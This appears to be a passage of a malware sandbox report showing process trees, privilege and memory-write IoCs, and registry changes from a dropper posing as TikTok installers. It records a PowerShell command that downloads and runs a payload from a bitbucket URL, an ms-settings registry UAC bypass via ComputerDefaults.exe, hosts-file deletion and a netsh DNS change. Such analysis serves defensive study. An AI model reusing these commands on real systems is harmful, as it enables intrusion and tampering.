3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	main_v4.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	main_v4.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1872	powershell.exe
1872	powershell.exe
2688	powershell.exe
2688	powershell.exe
4892	powershell.exe
4892	powershell.exe
1496	powershell.exe
1496	powershell.exe
4368	powershell.exe
4368	powershell.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe
3840	filer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3232	New Text Document mod.exe
Token: SeDebugPrivilege	4372	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2512	wmic.exe
Token: SeSecurityPrivilege	2512	wmic.exe
Token: SeTakeOwnershipPrivilege	2512	wmic.exe
Token: SeLoadDriverPrivilege	2512	wmic.exe
Token: SeSystemProfilePrivilege	2512	wmic.exe
Token: SeSystemtimePrivilege	2512	wmic.exe
Token: SeProfSingleProcessPrivilege	2512	wmic.exe
Token: SeIncBasePriorityPrivilege	2512	wmic.exe
Token: SeCreatePagefilePrivilege	2512	wmic.exe
Token: SeBackupPrivilege	2512	wmic.exe
Token: SeRestorePrivilege	2512	wmic.exe
Token: SeShutdownPrivilege	2512	wmic.exe
Token: SeDebugPrivilege	2512	wmic.exe
Token: SeSystemEnvironmentPrivilege	2512	wmic.exe
Token: SeRemoteShutdownPrivilege	2512	wmic.exe
Token: SeUndockPrivilege	2512	wmic.exe
Token: SeManageVolumePrivilege	2512	wmic.exe
Token: 33	2512	wmic.exe
Token: 34	2512	wmic.exe
Token: 35	2512	wmic.exe
Token: 36	2512	wmic.exe
Token: SeIncreaseQuotaPrivilege	2512	wmic.exe
Token: SeSecurityPrivilege	2512	wmic.exe
Token: SeTakeOwnershipPrivilege	2512	wmic.exe
Token: SeLoadDriverPrivilege	2512	wmic.exe
Token: SeSystemProfilePrivilege	2512	wmic.exe
Token: SeSystemtimePrivilege	2512	wmic.exe
Token: SeProfSingleProcessPrivilege	2512	wmic.exe
Token: SeIncBasePriorityPrivilege	2512	wmic.exe
Token: SeCreatePagefilePrivilege	2512	wmic.exe
Token: SeBackupPrivilege	2512	wmic.exe
Token: SeRestorePrivilege	2512	wmic.exe
Token: SeShutdownPrivilege	2512	wmic.exe
Token: SeDebugPrivilege	2512	wmic.exe
Token: SeSystemEnvironmentPrivilege	2512	wmic.exe
Token: SeRemoteShutdownPrivilege	2512	wmic.exe
Token: SeUndockPrivilege	2512	wmic.exe
Token: SeManageVolumePrivilege	2512	wmic.exe
Token: 33	2512	wmic.exe
Token: 34	2512	wmic.exe
Token: 35	2512	wmic.exe
Token: 36	2512	wmic.exe
Token: SeIncreaseQuotaPrivilege	3500	wmic.exe
Token: SeSecurityPrivilege	3500	wmic.exe
Token: SeTakeOwnershipPrivilege	3500	wmic.exe
Token: SeLoadDriverPrivilege	3500	wmic.exe
Token: SeSystemProfilePrivilege	3500	wmic.exe
Token: SeSystemtimePrivilege	3500	wmic.exe
Token: SeProfSingleProcessPrivilege	3500	wmic.exe
Token: SeIncBasePriorityPrivilege	3500	wmic.exe
Token: SeCreatePagefilePrivilege	3500	wmic.exe
Token: SeBackupPrivilege	3500	wmic.exe
Token: SeRestorePrivilege	3500	wmic.exe
Token: SeShutdownPrivilege	3500	wmic.exe
Token: SeDebugPrivilege	3500	wmic.exe
Token: SeSystemEnvironmentPrivilege	3500	wmic.exe
Token: SeRemoteShutdownPrivilege	3500	wmic.exe
Token: SeUndockPrivilege	3500	wmic.exe
Token: SeManageVolumePrivilege	3500	wmic.exe
Token: 33	3500	wmic.exe
Token: 34	3500	wmic.exe
Token: 35	3500	wmic.exe

Suspicious use of FindShellTrayWindow 7 IoCs

pid	Process
4588	AmLzNi.exe
4588	AmLzNi.exe
4588	AmLzNi.exe
1560	Reynolds.com
1560	Reynolds.com
1560	Reynolds.com
1464	explorer.exe

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
4588	AmLzNi.exe
4588	AmLzNi.exe
4588	AmLzNi.exe
1560	Reynolds.com
1560	Reynolds.com
1560	Reynolds.com

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
3600	tik-tok-1.0.5.0-installer_iPXA-F1.exe
3600	tik-tok-1.0.5.0-installer_iPXA-F1.exe
3840	filer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3232 wrote to memory of 3600	3232	New Text Document mod.exe	81
PID 3232 wrote to memory of 3600	3232	New Text Document mod.exe	81
PID 3232 wrote to memory of 3600	3232	New Text Document mod.exe	81
PID 3232 wrote to memory of 2332	3232	New Text Document mod.exe	82
PID 3232 wrote to memory of 2332	3232	New Text Document mod.exe	82
PID 3232 wrote to memory of 2332	3232	New Text Document mod.exe	82
PID 2332 wrote to memory of 4372	2332	main_v4.exe	84
PID 2332 wrote to memory of 4372	2332	main_v4.exe	84
PID 2332 wrote to memory of 4372	2332	main_v4.exe	84
PID 2332 wrote to memory of 2512	2332	main_v4.exe	86
PID 2332 wrote to memory of 2512	2332	main_v4.exe	86
PID 2332 wrote to memory of 2512	2332	main_v4.exe	86
PID 2332 wrote to memory of 3500	2332	main_v4.exe	87
PID 2332 wrote to memory of 3500	2332	main_v4.exe	87
PID 2332 wrote to memory of 3500	2332	main_v4.exe	87
PID 2332 wrote to memory of 1872	2332	main_v4.exe	88
PID 2332 wrote to memory of 1872	2332	main_v4.exe	88
PID 2332 wrote to memory of 1872	2332	main_v4.exe	88
PID 2332 wrote to memory of 2528	2332	main_v4.exe	89
PID 2332 wrote to memory of 2528	2332	main_v4.exe	89
PID 2332 wrote to memory of 2528	2332	main_v4.exe	89
PID 2332 wrote to memory of 2704	2332	main_v4.exe	90
PID 2332 wrote to memory of 2704	2332	main_v4.exe	90
PID 2332 wrote to memory of 2704	2332	main_v4.exe	90
PID 3232 wrote to memory of 3096	3232	New Text Document mod.exe	91
PID 3232 wrote to memory of 3096	3232	New Text Document mod.exe	91
PID 3232 wrote to memory of 3096	3232	New Text Document mod.exe	91
PID 3096 wrote to memory of 2976	3096	TikTok18.exe	92
PID 3096 wrote to memory of 2976	3096	TikTok18.exe	92
PID 3096 wrote to memory of 2976	3096	TikTok18.exe	92
PID 2332 wrote to memory of 5116	2332	main_v4.exe	93
PID 2332 wrote to memory of 5116	2332	main_v4.exe	93
PID 2332 wrote to memory of 5116	2332	main_v4.exe	93
PID 2332 wrote to memory of 4800	2332	main_v4.exe	94
PID 2332 wrote to memory of 4800	2332	main_v4.exe	94
PID 2332 wrote to memory of 4800	2332	main_v4.exe	94
PID 2332 wrote to memory of 1508	2332	main_v4.exe	95
PID 2332 wrote to memory of 1508	2332	main_v4.exe	95
PID 2332 wrote to memory of 1508	2332	main_v4.exe	95
PID 2332 wrote to memory of 1884	2332	main_v4.exe	96
PID 2332 wrote to memory of 1884	2332	main_v4.exe	96
PID 2332 wrote to memory of 1884	2332	main_v4.exe	96
PID 2332 wrote to memory of 4428	2332	main_v4.exe	97
PID 2332 wrote to memory of 4428	2332	main_v4.exe	97
PID 2332 wrote to memory of 4428	2332	main_v4.exe	97
PID 2332 wrote to memory of 932	2332	main_v4.exe	98
PID 2332 wrote to memory of 932	2332	main_v4.exe	98
PID 2332 wrote to memory of 932	2332	main_v4.exe	98
PID 2332 wrote to memory of 2688	2332	main_v4.exe	99
PID 2332 wrote to memory of 2688	2332	main_v4.exe	99
PID 2332 wrote to memory of 2688	2332	main_v4.exe	99
PID 2332 wrote to memory of 4876	2332	main_v4.exe	100
PID 2332 wrote to memory of 4876	2332	main_v4.exe	100
PID 2332 wrote to memory of 4876	2332	main_v4.exe	100
PID 2332 wrote to memory of 5112	2332	main_v4.exe	101
PID 2332 wrote to memory of 5112	2332	main_v4.exe	101
PID 2332 wrote to memory of 5112	2332	main_v4.exe	101
PID 2332 wrote to memory of 3428	2332	main_v4.exe	102
PID 2332 wrote to memory of 3428	2332	main_v4.exe	102
PID 2332 wrote to memory of 3428	2332	main_v4.exe	102
PID 3232 wrote to memory of 3336	3232	New Text Document mod.exe	103
PID 3232 wrote to memory of 3336	3232	New Text Document mod.exe	103
PID 3232 wrote to memory of 3336	3232	New Text Document mod.exe	103
PID 3336 wrote to memory of 4536	3336	papa_hr_build.exe	104

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:632
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:560

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:992

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:772

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1072

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1220

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1252

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1408

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1488
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:420
- - C:\Windows\SysWOW64\svchost.exe
    "C:\Windows\System32\svchost.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3400
- - C:\Windows\SysWOW64\svchost.exe
    "C:\Windows\System32\svchost.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1644

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1796

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1820

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1848

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1972

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1092

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2080

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2128

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2284

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2412

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2532

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2552

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2572

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2592

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2600

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:1344

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3312
- C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
  "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3232
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3740
- - C:\Users\Admin\AppData\Local\Temp\a\tik-tok-1.0.5.0-installer_iPXA-F1.exe
    "C:\Users\Admin\AppData\Local\Temp\a\tik-tok-1.0.5.0-installer_iPXA-F1.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:3600
- - C:\Users\Admin\AppData\Local\Temp\a\main_v4.exe
    "C:\Users\Admin\AppData\Local\Temp\a\main_v4.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies system certificate store
    - Suspicious use of WriteProcessMemory
    PID:2332
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4372
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic os get Caption,Version
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2512
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic os get InstallDate
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:3500
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -command [CultureInfo]::InstalledUICulture.Name
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1872
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic cpu get Name,NumberOfCores,NumberOfLogicalProcessors,Manufacturer
      4⤵
      System Location Discovery: System Language Discovery
      PID:2528
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic memorychip get Capacity
      4⤵
      System Location Discovery: System Language Discovery
      PID:2704
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic path win32_videocontroller get Name
      4⤵
      System Location Discovery: System Language Discovery
      Detects videocard installed
      PID:5116
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      System Location Discovery: System Language Discovery
      PID:4800
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      System Location Discovery: System Language Discovery
      PID:1508
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:1884
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic os get Caption,Version
      4⤵
      System Location Discovery: System Language Discovery
      PID:4428
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic os get InstallDate
      4⤵
      System Location Discovery: System Language Discovery
      PID:932
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -command [CultureInfo]::InstalledUICulture.Name
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2688
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic cpu get Name,NumberOfCores,NumberOfLogicalProcessors,Manufacturer
      4⤵
      System Location Discovery: System Language Discovery
      PID:4876
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic memorychip get Capacity
      4⤵
      System Location Discovery: System Language Discovery
      PID:5112
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic path win32_videocontroller get Name
      4⤵
      System Location Discovery: System Language Discovery
      Detects videocard installed
      PID:3428
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      System Location Discovery: System Language Discovery
      PID:3612
  - - C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      System Location Discovery: System Language Discovery
      PID:1008
- - C:\Users\Admin\AppData\Local\Temp\a\TikTok18.exe
    "C:\Users\Admin\AppData\Local\Temp\a\TikTok18.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3096
  - - C:\Users\Admin\AppData\Local\Temp\e581604\TikTok18.exe
      run=1 shortcut="C:\Users\Admin\AppData\Local\Temp\a\TikTok18.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2976
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c .\TikTok18.bat
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2028
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superappsss/1/downloads/papa_hr_build.exe', 'C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe')";
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4892
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe;
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2204
        
        C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe
        
        C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe ;
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:4352
        
        C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1100
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4352 -s 300
        8⤵
        Program crash
        
        PID:4868
- - C:\Users\Admin\AppData\Local\Temp\a\papa_hr_build.exe
    "C:\Users\Admin\AppData\Local\Temp\a\papa_hr_build.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3336
  - - C:\Users\Admin\AppData\Local\Temp\a\papa_hr_build.exe
      "C:\Users\Admin\AppData\Local\Temp\a\papa_hr_build.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4536
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3336 -s 300
      4⤵
      Program crash
      PID:1896
- - C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe
    "C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe"
    3⤵
    - Executes dropped EXE
    PID:4948
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:2392
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        
        PID:3564
  - - C:\Windows\system32\cmd.exe
      /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\2998.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
      4⤵
      PID:2616
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\2998.vbs" /f
        5⤵
        Modifies registry class
        
        PID:3872
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
        5⤵
        Modifies registry class
        
        PID:3016
  - - C:\Windows\system32\cmd.exe
      /c start /B ComputerDefaults.exe
      4⤵
      PID:2484
    - - C:\Windows\system32\ComputerDefaults.exe
        
        ComputerDefaults.exe
        5⤵
        
        PID:3908
      - C:\Windows\system32\wscript.exe
        
        "wscript.exe" C:\Users\Admin\AppData\Local\Temp\2998.vbs
        6⤵
        
        PID:4736
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
        7⤵
        
        PID:3416
  - - C:\Windows\system32\cmd.exe
      /c del /f C:\Users\Admin\AppData\Local\Temp\2998.vbs
      4⤵
      PID:2864
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:3300
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        Modifies registry class
        
        PID:4748
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:4588
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        
        PID:2432
  - - C:\Windows\system32\cmd.exe
      /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\2510.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
      4⤵
      PID:1516
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\2510.vbs" /f
        5⤵
        Modifies registry class
        
        PID:1420
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
        5⤵
        Modifies registry class
        
        PID:4568
  - - C:\Windows\system32\cmd.exe
      /c start /B ComputerDefaults.exe
      4⤵
      PID:1084
    - - C:\Windows\system32\ComputerDefaults.exe
        
        ComputerDefaults.exe
        5⤵
        
        PID:2512
      - C:\Windows\system32\wscript.exe
        
        "wscript.exe" C:\Users\Admin\AppData\Local\Temp\2510.vbs
        6⤵
        
        PID:4864
        
        C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" interface ip set dns "Wi-Fi" dhcp
        7⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4396
  - - C:\Windows\system32\cmd.exe
      /c del /f C:\Users\Admin\AppData\Local\Temp\2510.vbs
      4⤵
      PID:4236
  - - C:\Windows\system32\cmd.exe
